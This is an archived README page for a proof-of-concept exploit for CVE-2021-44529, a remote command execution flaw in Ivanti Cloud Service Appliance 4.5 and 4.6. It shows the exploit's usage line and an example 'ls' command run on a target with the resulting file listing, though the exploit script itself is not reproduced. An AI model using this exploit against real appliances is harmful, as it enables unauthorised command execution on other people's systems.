关联漏洞
Description
CVE-2021-44529 PoC
介绍
# CVE-2021-44529
## Vendor Homepage: https://www.ivanti.com/
## Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
## Version: CSA 4.6 4.5 - EOF Aug 2021
Execute
```
python3 exploit.py <URL> <command>
```
Example
```
python3 exploit.py 'https://x.x.x.x' 'ls'
LDMGdeploy.pdf
LDSupport.exe
OnDemand.php
RCClient.dmg
RCClient.exe
about.php
download.php
images
index.php
menus.php
site.conf
style.php
test.txt
tools.php
```
The exploit present in this repository should be used only for educational purpose. I am not responsible for any illegal activity carried out using exploits or snippet of it.
文件快照
[4.0K] /data/pocs/49993f6a1ab9464ff901f01886ee244c476470dc
├── [ 571] exploit.py
└── [ 645] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。